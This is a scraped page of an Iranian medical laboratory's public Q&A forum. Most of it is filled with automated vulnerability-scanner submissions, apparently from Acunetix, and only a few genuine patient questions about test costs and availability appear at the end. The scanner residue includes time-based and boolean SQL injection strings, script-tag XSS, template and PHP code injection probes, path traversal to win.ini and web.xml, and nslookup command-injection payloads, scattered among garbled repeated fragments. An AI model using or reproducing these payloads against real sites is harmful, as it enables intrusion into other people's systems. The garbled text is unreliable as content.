` آزمایشگاه تشخیص طبی و پاتولوژی نوین
 پیام روز
 • آزمایشگاه نوین ، نوین در خدمات آزمایشگاهی
 • بهره گیری از کادر مجرب و آموزش دیدهکادر
 • تشخیص مطمئن جامعه ایمنتشخیص
 • استفاده از خونگیری وکیوم جهت حصول نتایج دقیق تر وکیوم
 • اولین آزمایشگاه دارای گواهینامه ISO9001:2008از شرکت آمریکائی BRS در شمال غرب کشور BRS
 • بهره گیری از تجهیزات به روز4
 • استفاده از دستگاه فوق پیشرفته H1 هماتولوژی
  تالار گفتگو

  شما عزیزان می توانید سؤالات علمی و عمومی خود را پیرامون مسائل آزمایشگاهی با متخصصین این مرکز مطرح نمایید و پاسخ خود را در همین صفحه دریافت کنید.نوشتن شماره همراه ضروری است؛ تا در صورت لزوم امکان تماس با شما از طرف متخصصین مرکز وجود داشته باشد. لازم بذکر است شماره تماس شما بر روی وب سایت قابل رؤیت نمی باشد.  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  i6IBlhS8'));select pg_sleep(12); --
  20
  1
  unsMQVj9');select pg_sleep(12); --
  20
  1
  ynBMValM';select pg_sleep(12); --
  20
  1
  vh73laH2')); waitfor delay '0:0:12' --
  20
  1
  r9bWKwW4'); waitfor delay '0:0:12' --
  20
  1
  IOPAjhAi'; waitfor delay '0:0:8' --
  20
  1
  1 waitfor delay '0:0:8' --
  20
  1
  (select(0)from(select(sleep(8)))v)/*'+(select(0)from(select(sleep(8)))v)+'"+(select(0)from(select(sleep(8)))v)+"*/
  20
  1
  0"XOR(if(now()=sysdate(),sleep(8),0))XOR"Z
  20
  1
  0'XOR(if(now()=sysdate(),sleep(8),0))XOR'Z
  20
  1
  if(now()=sysdate(),sleep(8),0)
  20
  1
  -1" OR 2+817-817-1=0+0+0+1 --
  20
  1
  -1' OR 2+918-918-1=0+0+0+1 or 'sYSY0jsQ'='
  20
  1
  -1' OR 2+138-138-1=0+0+0+1 --
  20
  1
  -1 OR 2+56-56-1=0+0+0+1
  20
  1
  -1 OR 2+761-761-1=0+0+0+1 --
  20
  1
  H5TeXFVb
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.<%div style=width:expression(oGqg(9871))>
  20
  1
  Mr.<ScRiPt>oGqg(9804)</sCripT>
  20
  1
  Mr.\u003CScRiPt\oGqg(9898)\u003C/sCripT\u003E
  20
  1
  %4D%72%2E%3C%53%63%52%69%50%74%20%3E%6F%47%71%67%289784%29%3C%2F%73%43%72%69%70%54%3E
  20
  1
  {{9999347*9999087}}
  20
  1
  CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g� ]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
  20
  1
  acux5928��z1��z2a�bcxuca5928
  20
  1
  acu6521<s1﹥s2ʺs3ʹuca6521
  20
  1
  Mr.9325960
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1<%div style=width:expression(oGqg(9377))>
  Mr.
  20
  1<ScRiPt>oGqg(9139)</sCripT>
  Mr.
  20
  1\u003CScRiPt\oGqg(9102)\u003C/sCripT\u003E
  Mr.
  20
  %31%3C%53%63%52%69%50%74%20%3E%6F%47%71%67%289548%
  Mr.
  20
  ../../../../../../../../../../windows/win.ini
  Mr.
  20
  {{9999480*9999566}}
  Mr.
  20
  CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F� G&َ7�
  Mr.
  20
  acux8031��z1��z2a�bcxuca8031
  Mr.
  20
  acu4188<s1﹥s2ʺs3ʹuca4188
  Mr.
  20
  1
  Mr.
  @@OK6tp
  19859348
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20<%div style=width:expression(oGqg(9274))>
  1
  Mr.
  20<ScRiPt>oGqg(9886)</sCripT>
  1
  Mr.
  20
  1
  Mr.
  20\u003CScRiPt\oGqg(9088)\u003C/sCripT\u003E
  1
  Mr.
  %32%30%3C%53%63%52%69%50%74%20%3E%6F%47%71%67%289602%29%3C%2F%73%43%72%69%70%54%3E
  ................windowswin.ini
  Mr.
  20
  1
  Mr.
  acux8115��z1��z2a�bcxuca8115
  1
  Mr.
  {{9999355*9999718}}
  1
  WEB-INF\web.xml
  20
  1
  WEB-INF/web.xml
  20
  1
  Mr.
  {{9999355*9999718}}
  1
  unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
  20
  1
  ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
  20
  1
  ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
  20
  1
  /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
  20
  1
  ..\..\..\..\..\..\..\..\windows\win.ini
  20
  1
  ................windowswin.ini
  20
  1
  ������������������������������������������������windows��win.ini
  20
  1
  ../../../../../../../../../../windows/win.ini.
  20
  1
  C:\WINDOWS\system32\drivers\etc\hosts
  20
  1
  ../../../../../../../../../../windows/win.ini
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g� ]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
  1
  Mr.
  20
  1
  Mr.
  acux8115��z1��z2a�bcxuca8115
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  WEB-INF\web.xml
  Mr.
  20
  WEB-INF/web.xml
  Mr.
  20
  unexisting/../../../../../../../../../../windows/w
  Mr.
  20
  ../.../.././../.../.././../.../.././../.../.././..
  Mr.
  20
  ../..//../..//../..//../..//../..//../..//../..//.
  Mr.
  20
  /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
  Mr.
  20
  ..\..\..\..\..\..\..\..\windows\win.ini
  Mr.
  20
  ................windowswin.ini
  Mr.
  20
  1
  Mr.
  acu9235<s1﹥s2ʺs3ʹuca9235
  ../../../../../../../../../../windows/win.ini
  Mr.
  20
  1
  Mr.
  209929907
  1
  Mr.
  20
  1
  Mr.
  20
  ../../../../../../../../../../windows/win.ini
  Mr.
  20
  @@2CPJw
  Mr.
  20
  1
  �''�""
  20
  1
  �'�"
  20
  ������������������������������������������������wi
  Mr.
  20
  ../../../../../../../../../../windows/win.ini.jpg
  Mr.
  20
  C:\WINDOWS\system32\drivers\etc\hosts
  Mr.
  20
  1
  JyI=
  20
  1
  @@nTC1X
  20
  1
  1����%2527%2522
  20
  1
  \
  20
  1
  1'"
  20
  C:\WINDOWS\system32\drivers\etc\hosts
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  �''�""
  Mr.
  20
  C:\WINDOWS\system32\drivers\etc\hosts
  Mr.
  20
  �'�"
  Mr.
  20
  JyI=
  Mr.
  20
  @@2CPJw
  Mr.
  20
  1
  testasp.vulnweb.com
  20
  1
  http://testasp.vulnweb.com/t/fit.txt?.
  20
  1
  Http://testasp.vulnweb.com/t/fit.txt
  20
  1
  1some_inexistent_file_with_long_name.
  20
  1
  http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  )
  1����%2527%2522
  Mr.
  20
  \
  Mr.
  20
  ../../../../../../../../../../windows/win.ini
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1'"
  Mr.
  20
  1
  Mr.
  �''�""
  1
  Mr.
  �'�"
  1
  Mr.
  JyI=
  1
  Mr.
  @@OK6tp
  1
  Mr.
  @@OK6tp
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  U7EOyUZK'));select pg_sleep(3); --
  Mr.
  20
  rhDUXyLR');select pg_sleep(3); --
  Mr.
  20
  Dgaa5WC2';select pg_sleep(3); --
  Mr.
  20
  -1));select pg_sleep(3); --
  Mr.
  20
  -1);select pg_sleep(9); --
  Mr.
  20
  -1;select pg_sleep(9); --
  Mr.
  20
  Aebk3uSk')); waitfor delay '0:0:9' --
  Mr.
  20
  Cc3pveSC'); waitfor delay '0:0:9' --
  Mr.
  20
  Tw1OUGvu'; waitfor delay '0:0:9' --
  Mr.
  20
  1 waitfor delay '0:0:9' --
  Mr.
  20
  -1)); waitfor delay '0:0:6' --
  Mr.
  20
  -1); waitfor delay '0:0:6' --
  Mr.
  20
  -1; waitfor delay '0:0:6' --
  Mr.
  20
  (select(0)from(select(sleep(6)))v)/*'+(select(0)fr
  Mr.
  20
  0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z
  Mr.
  20
  0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
  Mr.
  20
  if(now()=sysdate(),sleep(3),0)
  Mr.
  20
  -1" OR 2+58-58-1=0+0+0+1 --
  Mr.
  20
  -1' OR 2+521-521-1=0+0+0+1 or 'wgSqg8uG'='
  Mr.
  20
  -1' OR 2+285-285-1=0+0+0+1 --
  Mr.
  20
  -1 OR 2+81-81-1=0+0+0+1
  Mr.
  20
  -1 OR 2+867-867-1=0+0+0+1 --
  Mr.
  20
  npLGqVU6
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  jtDDOn8i'));select pg_sleep(8); --
  1
  Mr.
  OBcxd3Uz');select pg_sleep(8); --
  1
  Mr.
  GbQIDXEl';select pg_sleep(8); --
  1
  Mr.
  -1));select pg_sleep(8); --
  1
  Mr.
  -1);select pg_sleep(8); --
  1
  Mr.
  -1;select pg_sleep(25); --
  1
  Mr.
  fnp4O4X4')); waitfor delay '0:0:25' --
  1
  Mr.
  @@OK6tp
  testasp.vulnweb.com
  Mr.
  20
  1
  Mr.
  KM6VSyck'); waitfor delay '0:0:25' --
  1
  Mr.
  WOfuXCfT'; waitfor delay '0:0:25' --
  1
  Mr.
  1 waitfor delay '0:0:25' --
  1
  Mr.
  -1)); waitfor delay '0:0:25' --
  1
  Mr.
  -1); waitfor delay '0:0:17' --
  1
  Mr.
  -1; waitfor delay '0:0:17' --
  1
  Mr.
  (select(0)from(select(sleep(17)))v)/*'+(select(0)from(select(sleep(17)))v)+'"+(select(0)from(select(sleep(17)))v)+"*/
  1
  Mr.
  0"XOR(if(now()=sysdate(),sleep(17),0))XOR"Z
  1
  Mr.
  0'XOR(if(now()=sysdate(),sleep(17),0))XOR'Z
  1
  Mr.
  if(now()=sysdate(),sleep(17),0)
  1
  Mr.
  -1" OR 2+796-796-1=0+0+0+1 --
  1
  Mr.
  -1' OR 2+333-333-1=0+0+0+1 or 'XznjiIwt'='
  1
  Mr.
  -1' OR 2+433-433-1=0+0+0+1 --
  1
  Mr.
  -1 OR 2+406-406-1=0+0+0+1
  1
  Mr.
  -1 OR 2+359-359-1=0+0+0+1 --
  http://testasp.vulnweb.com/t/fit.txt?.jpg
  Mr.
  20
  Http://testasp.vulnweb.com/t/fit.txt
  Mr.
  20
  1some_inexistent_file_with_long_name.jpg
  Mr.
  20
  1
  Mr.
  nJ5kAIRv
  1
  Mr.
  20
  1
  ^(#$!@#$)(()))******
  20
  1
  !(()&&!|*|*|
  20
  1
  )
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  ^(#$!@#$)(()))******
  Mr.
  20
  !(()&&!|*|*|
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  http://some-inexistent-website.acu/some_inexistent
  Mr.
  20
  1
  Mr.
  testasp.vulnweb.com
  1
  Mr.
  http://testasp.vulnweb.com/t/fit.txt?.jpg
  1
  Mr.
  Http://testasp.vulnweb.com/t/fit.txt
  1
  Mr.
  1some_inexistent_file_with_long_name.jpg
  1
  Mr.
  http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
  1
  Mr.
  WEB-INF\web.xml
  1
  Mr.
  WEB-INF/web.xml
  1
  Mr.
  unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
  1
  Mr.
  20
  1
  Mr.
  ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
  1
  PagesFroum.aspx/.
  20
  1
  Mr.
  20
  )
  Mr.
  20
  1
  Mr.
  ^(#$!@#$)(()))******
  1
  Mr.
  !(()&&!|*|*|
  1
  Mr.
  20
  1
  Mr.
  20
  1
  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  20
  1
  Mr.
  20
  1
  Mr.
  )
  1
  PagesFroum.aspx
  20
  1
  PagesFroum.aspx
  20
  1
  Mr.
  1����%2527%2522
  1
  Mr.
  \
  1
  Mr.
  1'"
  1
  Mr.
  ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
  1
  Mr.
  /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
  1
  Mr.
  20
  1
  Mr.
  ..\..\..\..\..\..\..\..\windows\win.ini
  1
  Mr.
  ................windowswin.ini
  1
  Mr.
  ������������������������������������������������windows��win.ini
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  ../../../../../../../../../../windows/win.ini.jpg
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  '"
  20
  1
  Mr.
  20
  '"
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  ${@print(md5(acunetix_wvs_security_test))}\
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  C:\WINDOWS\system32\drivers\etc\hosts
  1
  Mr.
  ../../../../../../../../../../windows/win.ini
  1
  ${@print(md5(acunetix_wvs_security_test))}
  20
  1
  ";print(md5(acunetix_wvs_security_test));$a="
  20
  1
  Cm53GmtQ
  20
  1
  12345'"\'\");|]*{ <>�''💩
  20
  1
  ';print(md5(acunetix_wvs_security_test));$a='
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  ;print(md5(acunetix_wvs_security_test));
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  '"
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  ${@print(md5(acunetix_wvs_security_test))}\
  Mr.
  20
  ${@print(md5(acunetix_wvs_security_test))}
  Mr.
  20
  ";print(md5(acunetix_wvs_security_test));$a="
  Mr.
  20
  ';print(md5(acunetix_wvs_security_test));$a='
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  ;print(md5(acunetix_wvs_security_test));
  Mr.
  20
  1
  Mr.
  ${@print(md5(acunetix_wvs_security_test))}\
  PagesFroum.aspx/.
  Mr.
  20
  PagesFroum.aspx
  Mr.
  20
  1
  /www.vulnweb.com
  20
  1
  Mr.
  20
  /www.vulnweb.com
  Mr.
  20
  1
  Mr.
  20
  1
  testasp.vulnweb.com/t/xss.html?%00
  20
  1
  Mr.
  /www.vulnweb.com
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  ${@print(md5(acunetix_wvs_security_test))}
  1
  Mr.
  ";print(md5(acunetix_wvs_security_test));$a="
  1
  Mr.
  20
  PagesFroum.aspx
  Mr.
  20
  1
  HttP://testasp.vulnweb.com/t/xss.html?%00
  20
  1
  Mr.
  20
  1
  Mr.
  ';print(md5(acunetix_wvs_security_test));$a='
  1
  http://hitgNxQ8IhHbd.bxss.me/
  20
  1
  Mr.
  20
  1
  Mr.
  ;print(md5(acunetix_wvs_security_test));
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  testasp.vulnweb.com/t/xss.html?%00
  Mr.
  20
  ))))))))))))))))))))))))))))))))))))))))))))))))))
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  1
  Mr.
  PagesFroum.aspx/.
  1
  Mr.
  PagesFroum.aspx
  1
  Mr.
  PagesFroum.aspx
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  http://hitsq8UFVrFcP.bxss.me/
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.&n964791=v966298
  20
  1
  Mr.
  20
  1
  Mr.
  http://hitgf0YVDunHE.bxss.me/
  1
  Mr.
  20
  1
  Mr.
  20
  1
  &nslookup 6Y91Qx6s&'\"`0&nslookup 6Y91Qx6s&`'
  20
  1
  $(nslookup BmDs7ASF)
  20
  1
  set|set&set
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  &nslookup rzblkkX7&'\"`0&nslookup rzblkkX7&`'
  Mr.
  20
  1
  '"()
  20
  1
  Mr.
  20
  1&n928869=v963337
  Mr.
  20
  '"()
  Mr.
  20
  $(nslookup yOyKJROb)
  Mr.
  20
  1
  Mr.
  '"()
  1
  Mr.
  20&n941128=v902510
  HttP://testasp.vulnweb.com/t/xss.html?%00
  Mr.
  20
  1
  Mr.
  testasp.vulnweb.com/t/xss.html?%00
  set|set&set
  Mr.
  20
  1
  Mr.
  HttP://testasp.vulnweb.com/t/xss.html?%00
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  oCnzuZ2d
  Mr.
  20
  1
  Mr.
  SiA2rjTy
  1
  Mr.
  20
  1
  Mr.
  &nslookup KZg5J9n9&'\"`0&nslookup KZg5J9n9&`'
  1
  Mr.
  $(nslookup vWQhbb9W)
  12345'"\'\");|]*{ <>�''💩
  Mr.
  20
  1
  Mr.
  20
  1
  ${9999136+9999641}
  20
  1
  Mr.
  20
  ${10000030+9999346}
  Mr.
  20
  1
  Mr.
  ${10000004+10000293}
  1
  Mr.
  20
  1
  Mr.
  12345'"\'\");|]*{ <>�''💩
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  "+response.write(9587310*9594137)+"
  20
  1
  '+response.write(9587310*9594137)+'
  20
  1
  response.write(9587310*9594137)
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  set|set&set
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  "+response.write(9187966*9330342)+"
  Mr.
  20
  '+response.write(9187966*9330342)+'
  Mr.
  20
  1
  Mr.
  20
  response.write(9187966*9330342)
  Mr.
  20
  1
  Mr.
  "+response.write(9865976*9951342)+"
  1
  Mr.
  '+response.write(9865976*9951342)+'
  1
  Mr.
  response.write(9865976*9951342)
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  1
  Mr.
  20
  کلثوم
  آزمایش تشخیص پوکی استخوان انجام میدید؟
  سلام ، من وسە آزمایش تشخیص پوکی استخوان میخوام بیام آیا اونجا انجام میشە؟ شرایطش چطورە؟ چطور نوبت بگیرم؟ من از شهرستان یە استان دیگە میخوام بیام
  شکوری
  نمونه برداری از تیروئید
  ایا در ازمایشگاه نمونه برداری از تیروئید انجام میشود و طرف قردادبا بیمه ایران هستید و ساعات و روزهای کار ازمایشگاه را بفرمایید
  ثمره
  سوال
  با سلام و خسته نباشید.هزینه ceel free dna با بیمه دانا چقدر است
  حمیدرضاگیلانی
  هزینه آزمایش cells free dna
  لطفا هزینه آزمایش با بیمه تامین اجتماعی چند میشه cell free dna
  soltani
  pca3
  با سلام ممنون می شم اگر در مورد ازمایش پروستات pca3 برای تشخیص کنسر پروستات اطلاع بدین زمان جوابدهی هزینه ازمایش و اطلاعات مورد نیاز برای مریض همکار ازمایشگاهتون هستم برای همسرم که PSA بالا دارن می خواستم
  مهر ناز
  تعیین جنسیت
  با سلام ازمایش تعیین جنسیت دقیقا بعد اتمام هفته هفتمه؟هزینش چقدره؟قبل ازمایش باید رزرو کنیم؟یا نیازی نیس؟و قبل انجام ازمایش باید چیزی نخوریم یا اشکالی نداره؟
  لیلا
  cell free dna
  سلام هزینه تست cell free dna رو میخواستم بدونم و اینکه تست برای بررسی به کدوم کشور ارسال میشه ممنون
  فاطی
  اعصاب
  سلام.خسته نباشید.در ازمایشگاه شما امکان تشخیص بیماری های اعصاب و روان ممکن هس؟!
  داود
  تست اعتیاد
  با سلام ...آیا ازمایشگاه شما تست اعتیاد از طریق مو هم دارد و اینکه هزینه اش چقدر می باشد ؟
  رسول
  تعیین جنسبت
  با سلام . میخواستم بدون هزینه آزمایش cell free DNA با بیمه نیروهای مسلح چقدره؟
  زينب
  جنسيت
  جنسيت سلام ميخواستم ببينم تعيين جنسيت هزينش چقدره؟
  مریم زارع زاده
  جواب آزمایش تعیین جنسیت و از کدوم سایت پیگیر بشیم
  جواب آزمایش تعیین جنسیت و از کدوم سایت پیگیر بشیم
  نازيلا
  تعيين جنسيت
  سلام ميخواستم ببينم تعيين جنسيت و از هفته چند انجام ميدين و هزينش چقدره؟
  فرزانه
  هزینه ازمایش خلط
  باسلام میخاستم بدونم هزینه ازمایش خلط با بیمه تامین اجتماعی چقدره
  محمد درويشان
  ازمايش د ن ا
  مي خواستم ببينم امكان تشخيص پدر بچه در ماه اول بارداري وجود داره و شما انجام ميديد ؟
  1
  1
  1


  نام کاربر:        موضوع:        تلفن همراه:

  پیام:
             
  پاسخ به سوالات پزشکی شما

  ارزش تندرستی خویش را بدانید،پیش از آنکه به بیماری گرفتار آیید. پیامبر گرامی اسلام

  راهنمای آزمایشگاه